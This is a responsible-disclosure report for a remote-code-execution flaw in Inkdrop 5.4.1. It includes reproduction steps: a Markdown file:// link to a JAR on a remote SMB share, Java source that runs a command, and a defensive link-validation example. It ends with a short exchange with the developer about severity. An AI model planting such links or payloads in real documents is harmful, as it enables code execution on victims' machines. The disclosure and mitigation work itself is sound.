Inkdrop 5.4.1 - RCE via file URI schemes

Our security team found a security issue in InkDrop version 5.4.1. We have reserved CVE-2022-0698 to refer to this issue. Attached below is the link to our responsible disclosure policy.

Bug description

InkDrop version 5.4.1 allows an attacker to create a malicious link inside a Markdown file. When the victim clicks the link, the application opens the linked file with the default program. An attacker can abuse this, for example, to run a JAR file from an SMB server without any warning to the user.

CVSSv3 Vector:

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:L

CVSSv3 Base Score:

6.9

Steps to reproduce

  1. Create a markdown file with the following content.
[Click me](file://192.168.1.67/ROP/Exec.jar)
  2. Create a malicious JAR file and host it on an SMB server. The following code can be converted into a JAR file using jar cvfe Exec.jar Exec *.class
import java.io.*;

class Exec {

    public static void main(String[] args) {
        String command="cmd.exe /c ping 1.1.1.1";
        try {
            Process process = Runtime.getRuntime().exec(command);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
  3. Send the markdown file to the victim. When the victim clicks the markdown link, the JAR file will be executed from the remote server.

It is important to validate the URI and file type before opening it. In this PoC the JAR file is executed without even notifying the user.
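The validation the report asks for, as an added example that is not Inkdrop's code: a link policy an Electron app can apply in its link-click handler before passing an href to the OS. The names classifyLink, handleLinkClick and LAUNCHER_EXTENSIONS are hypothetical, and the two callbacks stand in for shell.openExternal and a confirmation dialog.

```javascript
// Added example, not Inkdrop's code: decide what to do with a clicked href
// before handing it to the OS shell. Names here are hypothetical.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
// File types the OS would pass to a launcher or interpreter instead of a viewer.
const LAUNCHER_EXTENSIONS = new Set(
  ['.jar', '.exe', '.msi', '.bat', '.cmd', '.ps1', '.vbs', '.js', '.hta', '.lnk', '.scr']);

// Returns { action: 'open' | 'confirm' | 'block', reason } for a clicked href.
function classifyLink(href) {
  let url;
  try { url = new URL(href); } catch (e) { return { action: 'block', reason: 'unparseable URL' }; }
  if (SAFE_SCHEMES.has(url.protocol)) return { action: 'open', reason: 'allow-listed scheme' };
  if (url.protocol !== 'file:') return { action: 'block', reason: `scheme ${url.protocol} not allowed` };
  // file://HOST/share/... is a UNC path: the OS would fetch it from a remote SMB
  // server, which is the vector in this report. Never open it silently.
  if (url.hostname !== '') return { action: 'block', reason: `remote share host ${url.hostname}` };
  let filePath;
  try {
    // Decode so %2E cannot hide the extension; Windows also drops trailing dots/spaces.
    filePath = decodeURIComponent(url.pathname).replace(/[. ]+$/, '');
  } catch (e) {
    return { action: 'block', reason: 'malformed percent-encoding' };
  }
  const m = /\.[^./\\]+$/.exec(filePath);
  const ext = m ? m[0].toLowerCase() : '';
  if (LAUNCHER_EXTENSIONS.has(ext)) return { action: 'block', reason: `launcher file type ${ext}` };
  // A local, non-launcher file still goes to the default program: ask first.
  return { action: 'confirm', reason: 'local file' };
}

// openExternal and askUser are injected so this runs outside Electron; in the app
// they would be shell.openExternal and a dialog.showMessageBox confirmation.
function handleLinkClick(href, openExternal, askUser) {
  const d = classifyLink(href);
  if (d.action === 'open' || (d.action === 'confirm' && askUser(href, d.reason))) {
    openExternal(href);
    return true;
  }
  return false;
}
```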

Screenshots and files


System Information

  • Version: InkDrop version 5.4.1.
  • Operating System: Windows 10.0.19042 N/A Build 19042.
  • Installer: Inkdrop-demo-5.4.1-Windows

Hi Oscar,

Thanks for the report. I don’t understand the severity.
How easy can attackers let people run those jar files via SMB?

Hi Takuya,

A possible attack vector could be that an attacker sends a Markdown file with the malicious link and when the user sees the preview, clicks on it. Applications in Electron must validate the links and at least warn the user while opening it because this can result in RCE.

But the attacker must be in the same local network as the target, no?